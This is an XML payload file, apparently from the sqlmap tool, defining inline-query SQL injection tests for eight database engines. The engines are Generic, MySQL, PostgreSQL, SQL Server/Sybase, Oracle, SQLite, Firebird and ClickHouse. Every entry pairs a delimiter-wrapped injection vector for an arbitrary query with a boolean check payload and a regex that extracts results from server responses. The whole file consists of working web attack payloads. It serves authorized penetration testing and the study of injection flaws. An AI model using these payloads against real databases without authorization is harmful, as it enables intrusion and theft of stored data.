1
<?xml version="1.0" encoding="UTF-8"?>
2

3
<root>
4
    <!-- Inline queries tests -->
5
    <test>
6
        <title>Generic inline queries</title>
7
        <stype>3</stype>
8
        <level>1</level>
9
        <risk>1</risk>
10
        <clause>1,2,3,8</clause>
11
        <where>3</where>
12
        <vector>(SELECT CONCAT(CONCAT('[DELIMITER_START]',([QUERY])),'[DELIMITER_STOP]'))</vector>
13
        <request>
14
            <payload>(SELECT CONCAT(CONCAT('[DELIMITER_START]',(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]'))</payload>
15
        </request>
16
        <response>
17
            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
18
        </response>
19
    </test>
20

21
    <test>
22
        <title>MySQL inline queries</title>
23
        <stype>3</stype>
24
        <level>2</level>
25
        <risk>1</risk>
26
        <clause>1,2,3,8</clause>
27
        <where>3</where>
28
        <vector>(SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
29
        <request>
30
            <payload>(SELECT CONCAT('[DELIMITER_START]',(ELT([RANDNUM]=[RANDNUM],1)),'[DELIMITER_STOP]'))</payload>
31
        </request>
32
        <response>
33
            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
34
        </response>
35
        <details>
36
            <dbms>MySQL</dbms>
37
        </details>
38
    </test>
39

40
    <test>
41
        <title>PostgreSQL inline queries</title>
42
        <stype>3</stype>
43
        <level>2</level>
44
        <risk>1</risk>
45
        <clause>1,2,3,8</clause>
46
        <where>3</where>
47
        <vector>(SELECT '[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]')</vector>
48
        <request>
49
            <payload>(SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]')</payload>
50
        </request>
51
        <response>
52
            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
53
        </response>
54
        <details>
55
            <dbms>PostgreSQL</dbms>
56
        </details>
57
    </test>
58

59
    <test>
60
        <title>Microsoft SQL Server/Sybase inline queries</title>
61
        <stype>3</stype>
62
        <level>2</level>
63
        <risk>1</risk>
64
        <clause>1,2,3,8</clause>
65
        <where>3</where>
66
        <vector>(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')</vector>
67
        <request>
68
            <payload>(SELECT '[DELIMITER_START]'+(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)+'[DELIMITER_STOP]')</payload>
69
        </request>
70
        <response>
71
            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
72
        </response>
73
        <details>
74
            <dbms>Microsoft SQL Server</dbms>
75
            <dbms>Sybase</dbms>
76
        </details>
77
    </test>
78

79
    <test>
80
        <title>Oracle inline queries</title>
81
        <stype>3</stype>
82
        <level>2</level>
83
        <risk>1</risk>
84
        <clause>1,2,3,8</clause>
85
        <where>3</where>
86
        <vector>(SELECT ('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') FROM DUAL)</vector>
87
        <request>
88
            <!-- NOTE: Vertica works too without the TO_NUMBER() -->
89
            <payload>(SELECT '[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN TO_NUMBER(1) ELSE TO_NUMBER(0) END)||'[DELIMITER_STOP]' FROM DUAL)</payload>
90
        </request>
91
        <response>
92
            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
93
        </response>
94
        <details>
95
            <dbms>Oracle</dbms>
96
        </details>
97
    </test>
98

99
    <test>
100
        <title>SQLite inline queries</title>
101
        <stype>3</stype>
102
        <level>3</level>
103
        <risk>1</risk>
104
        <clause>1,2,3,8</clause>
105
        <where>3</where>
106
        <vector>SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'</vector>
107
        <request>
108
            <payload>SELECT '[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)||'[DELIMITER_STOP]'</payload>
109
        </request>
110
        <response>
111
            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
112
        </response>
113
        <details>
114
            <dbms>SQLite</dbms>
115
        </details>
116
    </test>
117

118
    <test>
119
        <title>Firebird inline queries</title>
120
        <stype>3</stype>
121
        <level>3</level>
122
        <risk>1</risk>
123
        <clause>1,2,3,8</clause>
124
        <where>3</where>
125
        <vector>SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' FROM RDB$DATABASE</vector>
126
        <request>
127
            <payload>SELECT '[DELIMITER_START]'||(CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' FROM RDB$DATABASE</payload>
128
        </request>
129
        <response>
130
            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
131
        </response>
132
        <details>
133
            <dbms>Firebird</dbms>
134
        </details>
135
    </test>
136

137
    <test>
138
        <title>ClickHouse inline queries</title>
139
        <stype>3</stype>
140
        <level>3</level>
141
        <risk>1</risk>
142
        <clause>1,2,3,8</clause>
143
        <where>3</where>
144
        <vector>('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>
145
        <request>
146
            <payload>('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>
147
        </request>
148
        <response>
149
            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
150
        </response>
151
        <details>
152
            <dbms>ClickHouse</dbms>
153
        </details>
154
    </test>
155
    
156
    <!-- End of inline queries tests -->
157
</root>
158

159